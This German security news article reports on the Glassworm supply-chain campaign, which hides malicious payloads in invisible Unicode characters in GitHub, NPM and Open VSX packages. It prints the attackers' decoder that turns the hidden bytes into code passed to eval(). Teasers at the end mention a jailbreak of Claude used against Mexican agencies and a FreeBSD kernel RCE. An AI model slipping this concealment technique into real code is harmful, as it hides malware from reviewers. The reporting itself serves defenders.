Lieferkettenangriff nutzt unsichtbare Unicode-Zeichen zur Umgehung der Erkennung

Sicherheitsforscher von Aikido Security entdeckten einen Supply-Chain-Angriff, der unsichtbare Unicode-Codes verwendet, um bösartige Funktionen in Paketen zu verbergen, die auf GitHub, NPM und Open VSX hochgeladen wurden. Die Angreifergruppe, die den Namen Glassworm erhielt, lud vom 3. bis 9. März 2026 151 schädliche Pakete auf GitHub hoch.
Wie der unsichtbare Code funktioniert
Die schädlichen Pakete verwenden Unicode-Zeichen aus Public Use Areas (auch Public Use Access genannt), die in Editoren, Terminals und Code-Review-Oberflächen unsichtbar sind. Während der größte Teil des Codes normal erscheint, werden bösartige Funktionen und Nutzlasten mit diesen unsichtbaren Zeichen dargestellt, was manuelle Code-Reviews und herkömmliche Abwehrmaßnahmen unwirksam macht.
Die unsichtbaren Unicode-Zeichen repräsentieren jeden Buchstaben des US-Alphabets, wenn sie von Computern verarbeitet werden, erscheinen für Menschen jedoch als Leerzeichen oder leere Zeilen. JavaScript-Interpreter können diese Zeichen als normalen Code lesen und ausführen.
Technische Umsetzung
In einem analysierten Paket kodierten die Angreifer eine bösartige Nutzlast mit unsichtbaren Zeichen. Der Code enthält eine Dekodierfunktion, die die versteckten Bytes extrahiert und an eval() übergibt:
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
Der an s() übergebene Backtick-String erscheint in Viewern leer, enthält jedoch unsichtbare Zeichen, die zu einer vollständigen bösartigen Nutzlast dekodiert werden. Bei früheren Vorfällen holten dekodierte Nutzlasten Skripte der zweiten Stufe ab und führten sie aus, wobei Solana als Lieferkanal verwendet wurde, um Token, Zugangsdaten und Geheimnisse zu stehlen.
Angriffsmerkmale
Die schädlichen Pakete sind besonders schwer zu erkennen, weil:
- Die sichtbaren Teile des Codes von hoher Qualität und realistisch sind
- Umgebende Änderungen Dokumentationsanpassungen, Versionserhöhungen, kleine Refactorings und Fehlerbehebungen umfassen
- Die Änderungen stilistisch mit den Zielprojekten übereinstimmen
- Forscher vermuten, dass LLMs verwendet werden, um überzeugend legitime Pakete zu generieren
Diese Unicode-Technik wurde erstmals 2024 verwendet, um bösartige Prompts zu verbergen, die an KI-Engines gesendet wurden, und wurde seitdem für traditionelle Malware-Angriffe angepasst. Die 151 erkannten Pakete stellen wahrscheinlich nur einen kleinen Teil der Kampagne dar, da viele seit dem ersten Hochladen gelöscht wurden.
📖 Read the full source: HN AI Agents
👀 Siehe auch

Claude-Chatbot bei Datenleck in mexikanischer Regierung ausgenutzt
Ein Hacker nutzte Anthropics Claude-Chatbot, um mehrere mexikanische Regierungsbehörden anzugreifen und 150 GB Daten zu stehlen, darunter Steuerzahlerdaten und Mitarbeiterzugangsdaten. Der Hacker umging Claudes Sicherheitsvorkehrungen durch spezielle Prompts, um Tausende detaillierte Angriffspläne zu generieren.

SCION: Die sichere Schweizer Alternative zum BGP-Routingprotokoll
SCION (Scalability, Control, and Isolation On Next-Generation Networks) ist eine Internet-Routing-Architektur, die an der ETH Zürich entwickelt wurde und die Grundlage von BGP durch integrierte Sicherheit und Multi-Path-Routing ersetzt. Im Gegensatz zu BGP-Patches wie RPKI und BGPsec etabliert SCION Dutzende oder Hunderte paralleler Pfade mit Millisekunden-Umleitung bei Ausfällen.

FreeBSD-Kernel-RCE durch kgssapi.ko Stack-Pufferüberlauf (CVE-2026-4747)
Ein Stack-Pufferüberlauf im kgssapi.ko-Modul von FreeBSD ermöglicht Remote-Kernel-RCE mit Root-Shell über den NFS-Server. Die Schwachstelle betrifft FreeBSD 13.5, 14.3, 14.4 und 15.0 vor bestimmten Patches.

Claudes Sicherheitsüberprüfungsbefehl hat Einschränkungen für Produktionssysteme
Ein Entwickler fand Claudes Sicherheitsüberprüfungsbefehl hilfreich für grundlegende Validierungen wie MIME-Typen und Dateigrößenbeschränkungen, jedoch unzureichend für die Produktionshärtung gegen ausgeklügelte Bedrohungen. Die Lösung erforderte eine zweiwöchige Architekturüberholung, bei der die Dateiverarbeitung in einen eingeschränkten Worker mit begrenzten Berechtigungen ausgelagert wurde.